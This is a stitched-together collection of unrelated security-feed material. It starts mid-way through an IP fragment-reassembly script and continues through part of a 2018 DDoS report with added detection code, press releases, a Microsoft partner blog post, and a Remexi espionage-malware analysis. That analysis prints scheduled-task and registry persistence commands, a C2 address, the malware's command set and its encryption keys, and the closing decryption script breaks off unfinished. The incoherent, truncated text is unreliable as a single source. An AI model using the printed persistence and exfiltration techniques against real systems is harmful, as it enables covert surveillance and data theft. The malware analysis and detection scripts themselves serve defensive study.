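    def _evict_expired(self, now: float) -> None:
        stale = [k for k, b in self.buffers.items() if now - b.last_seen > self.timeout]
        for key in stale:
            self.held -= self.buffers[key].held
            del self.buffers[key]
            self.expired += 1

    def feed(self, frag: Fragment, now: float) -> Optional[bytes]:
        """Return the reassembled datagram when it is complete, else None."""
        self._evict_expired(now)
        if self.held + len(frag.payload) > self.max_held_bytes:
            self.dropped += 1      # bounded: refuse rather than grow without limit
            return None
        key = (frag.src, frag.dst, frag.ident)
        buf = self.buffers.setdefault(key, Buffer())
        if frag.offset not in buf.pieces:   # ignore duplicate fragments
            buf.pieces[frag.offset] = frag.payload
            buf.held += len(frag.payload)
            self.held += len(frag.payload)
        buf.last_seen = now
        if not frag.more:
            buf.total_len = frag.offset + len(frag.payload)
        if buf.total_len is None:
            return None
        # Complete only when the pieces cover [0, total_len) without gaps.
        data = bytearray()
        for off in sorted(buf.pieces):
            if off != len(data):
                return None
            data += buf.pieces[off]
        if len(data) != buf.total_len:
            return None
        self.held -= buf.held
        del self.buffers[key]
        return bytes(data)


def demo() -> dict:
    """Constructed scenario: one source sends 50 datagrams that never
    complete, then a legitimate two-fragment datagram arrives."""
    r = BoundedReassembler(max_held_bytes=1000, timeout=30.0)
    for i in range(50):
        r.feed(Fragment("203.0.113.9", "198.51.100.1", i, 0, True, b"x" * 100), now=0.0)
    # Cap reached: the legitimate first fragment is refused while junk remains.
    starved = r.feed(Fragment("192.0.2.7", "198.51.100.1", 7, 0, True, b"hello "), now=0.0)
    # After the timeout the junk is evicted and the datagram reassembles normally.
    first = r.feed(Fragment("192.0.2.7", "198.51.100.1", 7, 0, True, b"hello "), now=31.0)
    full = r.feed(Fragment("192.0.2.7", "198.51.100.1", 7, 6, False, b"world"), now=31.0)
    return {"held": r.held, "dropped": r.dropped, "expired": r.expired,
            "starved": starved, "first": first, "full": full}


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the trade-off: 50 never-completing datagrams from one source fill the cap, the first fragment of a legitimate datagram is refused (starved is None) until the junk times out, and only then does the datagram reassemble to b"hello world". A global cap alone turns memory exhaustion into denial of reassembly for everyone, which is why a real stack pairs it with a short timeout and per-queue limits rather than relying on the cap by itself.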

Another promising attack method uses the CoAP protocol, approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP runs over UDP, it inherits all of UDP's weaknesses, which means it can be harnessed to amplify DDoS attacks. Until now, this has not been a significant problem; however, experts note that between November 2017 and November 2018 the number of devices using CoAP increased almost 100 times, which is a major cause for concern.
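One way to notice the CoAP abuse this paragraph warns about is to look for the asymmetry that reflection leaves in flow data: a server answering on CoAP's default UDP port with far more bytes than it receives from a given peer. The script below is an added example, not from the report: the flow records are constructed, the 10x ratio and the 10,000-byte floor are assumed thresholds to tune per network, and port 5683 is CoAP's default port as registered in RFC 7252.

```python
"""Spot CoAP reflection/amplification in flow records (added example; the
records are constructed and the thresholds are assumptions to tune per site).
CoAP's default UDP port, 5683, comes from RFC 7252."""
from collections import defaultdict

COAP_PORT = 5683

# Constructed NetFlow-like records: (src, sport, dst, dport, proto, packets, bytes)
FLOWS = [
    # An ordinary IoT client talking to a CoAP server: small, balanced exchange.
    ("10.0.0.5", 40001, "192.0.2.10", COAP_PORT, "udp", 3, 180),
    ("192.0.2.10", COAP_PORT, "10.0.0.5", 40001, "udp", 3, 420),
    # Moderate asymmetry from a monitoring poller; stays below the flag threshold.
    ("10.0.0.8", 51000, "192.0.2.11", COAP_PORT, "udp", 50, 3000),
    ("192.0.2.11", COAP_PORT, "10.0.0.8", 51000, "udp", 50, 9000),
    # Reflection pattern: tiny requests "from" an outside host, answered with
    # responses twenty times larger. The outside host is the spoofed victim.
    ("203.0.113.20", 33000, "192.0.2.10", COAP_PORT, "udp", 500, 30000),
    ("192.0.2.10", COAP_PORT, "203.0.113.20", 33000, "udp", 500, 600000),
    # Unrelated TCP traffic, ignored.
    ("10.0.0.5", 52000, "192.0.2.10", 443, "tcp", 20, 4000),
]


def coap_reflection_report(flows, amp_ratio=10.0, min_response_bytes=10_000):
    """Return suspected (reflector, victim) pairs, largest first.

    For each CoAP server and remote peer, compare the bytes the server sent
    from port 5683 with the bytes it received on it. A peer that "asks" for
    little and "receives" a lot is the spoofed source of a reflection attack."""
    req = defaultdict(int)   # (server, peer) -> bytes sent to the server's CoAP port
    resp = defaultdict(int)  # (server, peer) -> bytes sent from the server's CoAP port
    for src, sport, dst, dport, proto, _pkts, nbytes in flows:
        if proto != "udp":
            continue
        if dport == COAP_PORT:
            req[(dst, src)] += nbytes
        elif sport == COAP_PORT:
            resp[(src, dst)] += nbytes
    findings = []
    for (server, peer), out_bytes in resp.items():
        in_bytes = req.get((server, peer), 0)
        ratio = out_bytes / in_bytes if in_bytes else float("inf")
        if out_bytes >= min_response_bytes and ratio >= amp_ratio:
            findings.append({"reflector": server, "victim": peer,
                             "amplification": round(ratio, 1),
                             "response_bytes": out_bytes})
    return sorted(findings, key=lambda f: f["response_bytes"], reverse=True)


if __name__ == "__main__":
    for f in coap_reflection_report(FLOWS):
        print(f"{f['reflector']} reflected {f['response_bytes']} bytes "
              f"({f['amplification']}x) toward {f['victim']}")
```

The flagged peer is the spoofed source address, i.e. the victim, and the server is the reflector; the same logic applies to any other UDP service by changing the port. Blocking the victim at the reflector is only a partial answer, because a reflector cannot tell a spoofed request from a real one; the durable fixes are not exposing CoAP to the internet and source-address validation (BCP 38) at the network edge.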

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Built on code borrowed from a kindred service, the platform is dangerous for its simplicity, low cost, and relative power: for just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was used in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDoS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison, though not yet for these incidents but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017)

The average duration of attacks grew steadily over 2018: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

Distribution of attack duration by type, 2018

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients seek out more professional implementers.

Statistics

Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is considered two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS attack victims and of the C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
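To make the counting rules above concrete, here is an added example (not Kaspersky's code) that applies them to constructed observations of botnet commands: one attack per (botnet, target) pair, split into a new attack whenever the gap between consecutive activity reaches 24 hours, with separate botnets counted separately and unique targets counted by IP address. The observation format, the timestamps and the way duration is derived (last observation minus first) are assumptions of the example.

```python
"""Apply the report's attack-counting rules to constructed observations
(added example, not Kaspersky's code). An observation is (UTC time, botnet,
target IP); the input format and the duration definition are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

GAP = timedelta(hours=24)  # an interval of 24 hours or more starts a new attack

# Constructed observations of botnet commands against targets.
OBSERVATIONS = [
    ("2018-10-16T08:00", "botnet-A", "198.51.100.10"),
    ("2018-10-16T09:30", "botnet-A", "198.51.100.10"),  # 1.5 h later: same attack
    ("2018-10-17T07:00", "botnet-A", "198.51.100.10"),  # 21.5 h later: still the same attack
    ("2018-10-18T12:00", "botnet-A", "198.51.100.10"),  # 29 h later: a new attack
    ("2018-10-16T08:05", "botnet-B", "198.51.100.10"),  # other botnet, same target: separate attack
    ("2018-10-18T12:00", "botnet-A", "203.0.113.5"),    # other target
    ("2018-10-19T12:00", "botnet-A", "203.0.113.5"),    # exactly 24 h later: a new attack
    ("2018-10-20T12:00", "botnet-B", "203.0.113.5"),
]


def count_attacks(observations, gap=GAP):
    """Return one (botnet, target, start, end) tuple per attack."""
    by_key = defaultdict(list)
    for ts, botnet, target in observations:
        by_key[(botnet, target)].append(datetime.fromisoformat(ts))
    attacks = []
    for (botnet, target), times in by_key.items():
        times.sort()
        start = prev = times[0]
        for t in times[1:]:
            if t - prev >= gap:            # activity resumed after 24 h or more
                attacks.append((botnet, target, start, prev))
                start = t
            prev = t
        attacks.append((botnet, target, start, prev))
    return attacks


def summarize(observations):
    """Headline numbers in the report's terms: attacks, unique targets, longest attack."""
    attacks = count_attacks(observations)
    longest = max(end - start for _, _, start, end in attacks)
    return {
        "attacks": len(attacks),
        "unique_targets": len({target for _, target, _, _ in attacks}),
        "longest_hours": longest.total_seconds() / 3600,
    }


if __name__ == "__main__":
    for botnet, target, start, end in count_attacks(OBSERVATIONS):
        print(f"{botnet} -> {target}: {start:%Y-%m-%d %H:%M} .. {end:%Y-%m-%d %H:%M}")
    print(summarize(OBSERVATIONS))
```

On the constructed input this yields 6 attacks against 2 unique targets, the longest spanning 23 hours; the 24-hour case on 203.0.113.5 shows the boundary rule ("24 hours or more" splits) explicitly. Changing the gap parameter shows how sensitive an attack count is to that one methodological choice, which is worth keeping in mind when comparing quarterly figures from different vendors.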

Securelist

Orange Acquires SecureData To Increase Its International Reach And Expertise In Cybersecurity.

Orange announces the acquisition of 100% of SecureData Group, and its consulting subsidiary SensePost.

SecureData is the largest independent cybersecurity service provider in the UK, the largest market in Europe.

This acquisition is yet another step toward establishing Orange’s position as a leading player in the European cybersecurity market.

Orange has announced today the acquisition of SecureData Group for an undisclosed amount.

The UK-based company, SecureData, is the largest independent cybersecurity service provider in the UK, the largest market in Europe. The company has a 25-year track record of providing integrated cyber solutions designed to assess risks, detect threats, protect customers' IT assets and respond to security incidents. The company's elite consulting arm, SensePost, enjoys a worldwide reputation for its expertise in cyber-criminality, security research and penetration testing. The company recorded annual revenues of circa 50 million euros in 2018 and has enjoyed consistent growth rates of approx. 20% since 2016.

With over 200 employees in the UK and South Africa and a well-respected management team, the company is well positioned in the strategically key British and Anglophone cybersecurity market. By offering improved access to this crucial market, SecureData constitutes an opportunity to expand Orange's capabilities, particularly in Europe.

Through additional technical cooperation, SecureData will help reinforce Orange’s strategic position in cyberdefense by bringing a new source of expertise and innovative technology. SecureData also boasts an advanced cyber-SOC (Security Operations Center) in the UK that will reinforce Orange Cyberdefense’s international reach by building upon the existing network of nine cyber-SOCs dedicated to monitoring and responding to security breaches on behalf of its customers.

By working alongside Orange Cyberdefense’s existing operations in France and Belgium, SecureData will ensure its continued development by leveraging access to Orange Business Services’ existing sales force and its customer base of over 3000 multinational companies, and will benefit from the carrier-grade CERT and threat intelligence team. The envisaged organisation is designed to ensure continuity of SecureData’s commercial and operational autonomy.

“We are very proud and happy to announce the acquisition of SecureData, which will mark a major milestone in Orange’s development in Europe’s cybersecurity market. SecureData, just like Orange Cyberdefense, has successfully made the transition toward Managed Security Services, and shares the same passion for Cyber. We will progressively co-build together the operational and commercial synergies, with the patronage and experience of Michel Van Den Berghe, CEO of Orange Cyberdefense. Cybersecurity has become a critical element for both large and small companies as they evolve in an increasingly digital-reliant world. We are convinced that the combined expertise of Orange Cyberdefense and SecureData will provide a powerful resource for our customers in ensuring the protection of their valuable data,” said Hugues Foulon, Executive Director of Strategy and Cybersecurity activities at Orange.

Ian Brown, Executive Chairman at SecureData, commented: “We are both thrilled and excited to be joining the Orange Cyberdefense family. Both organisations share the same vision and aspiration for the cybersecurity market, and have many complementary services and skills. By being part of Orange we will be able to better serve the international needs of many of our existing customers as well as providing enhanced cyber services to Orange customers within the UK.”

The post Orange Acquires SecureData To Increase Its International Reach And Expertise In Cybersecurity. appeared first on IT Security Guru.

Inspired and powered by partners

$32 billion in revenue. That’s an incredible number that Satya Nadella and Amy Hood shared during the Q2 earnings call last week. Just as impressive is the commercial cloud revenue increase of 48 percent year-over-year to $9 billion. Did you know that 95 percent of Microsoft’s commercial revenue flows directly through our partner ecosystem? With more than 7,500 partners joining that ecosystem every month, partner growth and partner innovation are directly fueling our commercial cloud growth. One accelerant, the IP co-sell program, now has thousands of co-sell ready partners that generated an incredible $8 billion in contracted partner revenue since the program began in July 2017.

It’s exciting to see the success of our partners, and to know we are collaborating with businesses of all types and sizes wherever there is opportunity. We’re working together with partners old and new to help them build their own digital capability to compete and grow. We’ve doubled down on our partnership with Accenture and Avanade, creating the new Accenture Microsoft Business Group to help customers overcome disruption and lead transformation in their industries. We’re partnering in new ways with customers like Kroger to bring their new Retail as a Service solution built on Azure, to use in their stores – and to sell to other retailers.

Part of Microsoft’s digital transformation is moving beyond transactional reselling via partners, to a true partnership philosophy where we’re working together to develop and sell each other’s technology and solutions. Our partners are building on our technology, collaborating with partners across borders to build repeatable solutions, and creating new revenue opportunities that didn’t exist in the past. We focus as much on selling third-party solutions as our own, and the speed of the cloud enables all of us to accelerate value to our customers.

I want to share more with you about how hundreds of thousands of Microsoft partners are powering customer innovation, and how we are evolving our partnership strategy in order to drive tech intensity for customers around the world.

Partner success and momentum

With hundreds of thousands of partners across the world, our partner ecosystem is stronger than ever.

CSP: Through our Cloud Solution Provider (CSP) program, our fastest-growing licensing model, partners are embedding Microsoft technologies into their own solutions and delivering more differentiated, long-term value for customers. The number of partners transacting through CSP is up 52 percent, and they are serving more than 2 million customers.

Azure Expert MSP: The Azure Expert MSP program has grown to 43 partners that deliver consistent, repeatable, high-fidelity managed services on Azure and are driving more than $100,000 per month in Azure consumption. A big part of this volume is in migration services, as SQL Server 2008 phases out this summer, followed by Windows Server 2008 a year from now. The opportunity for partners can’t be overstated. Our estimates put the opportunity around $50 billion for partners to help customers move their existing on-premises workloads to Azure and start capitalizing on the benefits of the cloud.

IP Co-Sell: Our industry-leading IP co-sell program that rewards Microsoft sellers for selling third-party solutions is a runaway success, generating $8 billion in contracted partner revenue since July. Our partners are reaping the benefits and seeing co-sell deals close nearly three times faster, projects that are nearly six times larger, and drive six times more Azure consumption.

Building the largest commercial marketplace

Gartner estimates the opportunity for business applications will be $133 billion this year, with independent software vendors (ISVs) driving more than half of that. So we are upping our commitment to ISVs by investing in Microsoft’s marketplaces, Azure Marketplace, and AppSource, to build the largest commercial marketplace in the industry. Our marketplace provides a frictionless selling and buying experience that brings parity to first and third-party solutions and meets the needs of both IP builders and software purchasers. Partners with solutions in our marketplace can sell directly to more than a billion customers and partners, and they benefit from lower deployment costs and flexible procurement models for software. Through the marketplace go-to-market services, we’ve seen partners achieve an average of 40 percent reduction in cost per lead, and a 2x lead conversion to sales rate compared to industry averages.

New capabilities are coming soon to AppSource and Azure Marketplace. One of the biggest developments is the ability for partners to offer their solutions to our partner ecosystem through the CSP program, with a single click. We’re also improving the user experience and interface with natural language and recommendations features. And by setting up private marketplaces, partners will be able to customize the terms for any specific customer—billing or metering their services on a per-user, per-app, per-month, or per-day basis to meet customer needs. And soon we’ll be offering curated portfolio IP & Services solutions that leverage Azure, Dynamics, Power BI, Power Apps, and Office.

AI for enterprise

IDC estimates that global spending on cognitive and artificial intelligence systems is expected to triple between 2018 and 2022, from $24 billion to $77.6 billion. And just like Microsoft transformed the way people work and live by making personal computing widely accessible in the 1980s and 1990s, we plan to do the same with artificial intelligence. Our aim is to make AI accessible to and valuable for everyone. We’ll do it by focusing on AI innovations that extend and empower human capabilities, while keeping people in control. Our partners are finding huge success and growth in the AI space. Through our AI Inner Circle Partner program, partners provide custom services and enhanced AI solutions to customers and have seen more than 200 percent growth in their AI practices year-over-year.

As we encourage partners to go all-in on AI, we need to make sure they have substantial resources and training. So, we’ve developed AI Practice Development Workshops, Advanced Education, trainings in the classroom, online, and at events. So far, since July, more than 29,000 people have been trained across Microsoft’s data and AI portfolios. Our popular AI Partner Development Playbook and library of online resources—collectively with more than 1 million downloads—have put answers at the fingertips of partners launching and expanding their AI services.

New HR skills playbook and tools

The latest in our series of Cloud Practice Development Playbooks, released today, is an outstanding human resources guide for partners and customers. We collected input from more than 700 partners to develop “Recruit, Hire, Onboard & Retain Talent.” It is a hands-on guide to walk partners through the HR process of recruiting, hiring, and onboarding employees. Alongside the playbook, we’re launching a new learning portal on MPN that simplifies partner training, and a new Partner Transformation Assessment Tool to help partners map resources and investments against solution areas and workloads.

Partner opportunities ahead

Microsoft’s mission is to empower every person and every organization on the planet to achieve more. And we know that partners make more possible. As a customer-first, partner-led company, we start with the needs of our customers and work with our partners to deliver the best outcomes for each organization. We look forward to continued evolution in the Microsoft-partner relationship this year—with more innovation in AI, more co-selling opportunities, and more ways to connect partners to customers and to other partners through Azure Marketplace and AppSource. I invite you to learn more about how Microsoft leaders from the Azure, Dynamics, and ISV teams are supporting our partners, and how partners can capitalize on the opportunities ahead.


The post Inspired and powered by partners appeared first on The Official Microsoft Blog.

Royal Air Force Selects SecureCloud+ For Team Tempest Network Collaboration Services.

Reading & Farnborough 4 February 2019. SecureCloud+, a trusted provider of next-generation secure information systems to government and defence, has been contracted by the Royal Air Force to deliver network collaboration services for Team Tempest.

Team Tempest is a global network of international partners formed by the Royal Air Force Rapid Capability Office (RCO) along with BAE Systems, Rolls Royce, MBDA and Leonardo. SecureCloud+ is the only SME to be part of the team, which is collaborating to meet a vision outlined in the UK Government’s defence modernisation plans. Team Tempest has signed a contract to develop a Next Generation Combat Air System capable of operating in the 2040+ environment.

Peter Williamson, founder and CEO of SecureCloud+, said: “We have a proven track record of delivering defence contracts on time and on budget using modern technologies to promote better communications. Our innovation and agility are critical components to rapidly build and develop greater collaboration.

“We are pleased to support Team Tempest and the vision for the Future Combat Air System Technology Initiative. This contract reinforces our commitment to innovation. And it is not just about secure collaboration – it is also about managing digital assets across industries to remove barriers to sharing and building trusted teamwork.”

Air Commodore Linc Taylor: “This is a critical programme that will deliver huge value for UK military defence capabilities. We have a long history of delivering world-class combat systems through collaboration with our best industries; this capability offers us the ability to fundamentally change the way we work and share information within and across our teams.”

The post Royal Air Force Selects SecureCloud+ For Team Tempest Network Collaboration Services. appeared first on IT Security Guru.

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots and browser data such as cookies, history and saved logins (decrypted where possible). The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities, notably the Background Intelligent Transfer Service (BITS) client bitsadmin.exe, to receive commands and exfiltrate data, and its C2 runs on IIS, using .asp pages to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with fairly long keys that are unique to each sample. Among these otherwise random keys, the word “salamati” (“health” in Farsi) was used once.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blog post is based on our original report, shared with our APT Intelligence Reporting customers in November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used the GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source modules: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. As those file names suggest, the malware consists of several worker threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both receiving C2 commands and exfiltrating data, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry has not provided any concrete evidence of how the Remexi malware spreads. For one victim, however, we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as a PE, which we believe may have dropped the malware. This dropper fetched its payload over FTP using hardcoded credentials; the FTP server was no longer accessible at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, covering configuration decryption and parsing, victim activity logging (launched as a separate module) and several worker threads for espionage and auxiliary functions (eight are listed in the events.exe section below). The Remexi developers rely on legitimate Microsoft utilities, enumerated below.

Utility and usage:
extract.exe: deploys the modules from the .cab file into the working “Event Cache” directory
bitsadmin.exe: fetches files from the C2 server, which are then parsed and executed as commands; also sends exfiltrated data
taskkill.exe: ends the working cycle of the modules

Persistence

Persistence relies on scheduled tasks and the system registry, and the mechanism varies by OS version. On old Windows versions such as XP, the main module events.exe runs an edited copy of Microsoft’s XPTask.vbs sample script to create a weekly scheduled task for itself. On newer versions, events.exe writes a task.xml task definition and then registers it as a Windows scheduled task with the following command:

schtasks.exe /create /TN "Events\CacheTask_<user_name_here>" /XML "<event_cache_dir_path>t /F"

At the registry level, the modules persist by adding themselves to the Userinit value,

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

(where they are able to write to the Winlogon subkey), and by adding a Run value,

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

All such indicators of compromise are listed in the corresponding appendix below.

Commands

All commands received from the C2 are first saved to an auxiliary file and then stored, encrypted, in the system registry. A dedicated thread decrypts and executes them.

Command and description:
search: searches for the specified files
search&upload: encrypts the matching files and adds them to the upload directory under the provided name
uploadfile: encrypts the specified file and adds it to the upload directory under the provided name
uploadfolder: encrypts the specified directory and adds it to the upload directory under the provided name
shellexecute: silently executes the received command with cmd.exe
wmic: silently executes the received command with wmic.exe (for WMI commands)
sendIEPass: encrypts all gathered browser data into files for upload to the C2
uninstall: removes the files, the working directory and the BITS jobs

Cryptography

To decrypt its configuration data the malware uses XOR with a 25-character key, such as “waEHleblxiQjoxFJQaIMLdHKz”, that differs for every sample. File encryption is RC4 through the Win32 CryptoAPI, with the RC4 key derived from the MD5 hash of the supplied password. Among these otherwise random keys, the word “salamati” (“health” in Farsi) was used once.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field (sample value): description
diskFullityCheckRatio (1.4): size threshold for the malware’s working directory; the directory is deleted once it grows as large as the free disk space multiplied by this ratio
captureScreenTimeOut (72): period, counted in loop iterations after a mouse click, between full-screen captures; a screenshot is taken when the counter is a multiple of this value (see below)
captureActiveWindowTimeOut (313): the same, for active-window captures
captureScreenQC (40): not really used; probably the full-screen screenshot quality
captureActiveQC (40): not really used; probably the active-window screenshot quality
CaptureSites (VPN*0,0 / Login*0,0 / mail*0,0 / Security*0,0): window titles of interest for screenshots, triggered through the left-mouse-button and Enter-key hooks
important (upLog.txt, upSCRLog.txt, upSpecial.txt, upFile.txt, upMSLog.txt): list of files the dedicated thread sends to the C2 with bitsadmin.exe
maxUpFileSizeKByte (1000000): maximum size, in KB, of a file uploaded to the C2
Servers (http://108.61.189.174): control server HTTP URL
ZipPass (KtJvOXulgibfiHk): password for the uploaded zip archives
browserPasswordCheckTimeout (300000): milliseconds to wait between rounds of gathering key3.db, cookies.sqlite and other browser files in the dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut deserve a closer look, because their logic is not intuitive.

One malware thread runs an infinite loop that increments an integer counter and checks whether a mouse button was pressed. When the mouse hook registers a click, it signals the screenshot thread through a global variable. That thread then checks whether the counter is a multiple of captureScreenTimeOut (for a full-screen capture) or of captureActiveWindowTimeOut (for an active-window capture), and takes the screenshot only when the remainder is zero. The two values therefore act as periods rather than timeouts.
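The cryptography and configuration handling described above, as an added example in Python that is not code from the report or from the malware: it strips the XOR layer from a Remexi-style config.ini using the 25-byte key quoted above, parses the result, decrypts an RC4-encrypted log with a key derived from the MD5 of the configured password, and models the click-counter screenshot trigger. The INI layout of the sample configuration, the cyclic application of the XOR key over the whole file, and the use of the raw MD5 digest as the 128-bit RC4 key (the CryptDeriveKey behaviour for CALG_RC4 over an MD5 hash object) are assumptions; the encrypted blobs are constructed inline from plaintext rather than taken from a real sample.

```python
"""Added example (not Kaspersky's or the malware's code): Remexi-style
config and log decryption as the report describes it."""
import hashlib

# 25-byte XOR key quoted in the report; every real sample has its own.
XOR_KEY = b"waEHleblxiQjoxFJQaIMLdHKz"
# Zip/RC4 password from the report's sample configuration.
RC4_PASSWORD = "KtJvOXulgibfiHk"


def xor_cyclic(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. Assumption: the malware applies the
    key cyclically over the whole file. Symmetric, so it also encrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_key_from_password(password: str) -> bytes:
    """Assumption: the 128-bit RC4 key is the raw MD5 digest of the password,
    which is what CryptDeriveKey(CALG_RC4) yields from an MD5 hash object when
    the requested key length does not exceed the digest length."""
    return hashlib.md5(password.encode("utf-8")).digest()


def parse_ini(text: str) -> dict:
    """Minimal key=value parser; lines starting with ';' or '#' are comments."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            cfg[key.strip()] = value.strip()
    return cfg


def decrypt_config(blob: bytes, xor_key: bytes = XOR_KEY) -> dict:
    """config.ini -> dict: strip the XOR layer, then parse."""
    return parse_ini(xor_cyclic(blob, xor_key).decode("utf-8", errors="replace"))


def decrypt_log(blob: bytes, password: str = RC4_PASSWORD) -> bytes:
    """RC4-decrypt an exfiltration log with the MD5-derived key."""
    return rc4(rc4_key_from_password(password), blob)


def screenshot_due(click_counter: int, period: int) -> bool:
    """Trigger from the Configuration section: a capture fires when the loop
    counter is a multiple of captureScreenTimeOut / captureActiveWindowTimeOut."""
    return period > 0 and click_counter % period == 0


def rc4_selftest() -> bool:
    """Public RC4 test vector: key 'Key', plaintext 'Plaintext'."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


# Constructed sample data (not artefacts from a real sample). The INI layout,
# including ';' as the CaptureSites separator, is an assumption.
PLAIN_CONFIG = (
    "diskFullityCheckRatio=1.4\n"
    "captureScreenTimeOut=72\n"
    "captureActiveWindowTimeOut=313\n"
    "CaptureSites=VPN*0,0;Login*0,0;mail*0,0;Security*0,0\n"
    "Servers=http://108.61.189.174\n"
    "ZipPass=KtJvOXulgibfiHk\n"
    "browserPasswordCheckTimeout=300000\n"
)
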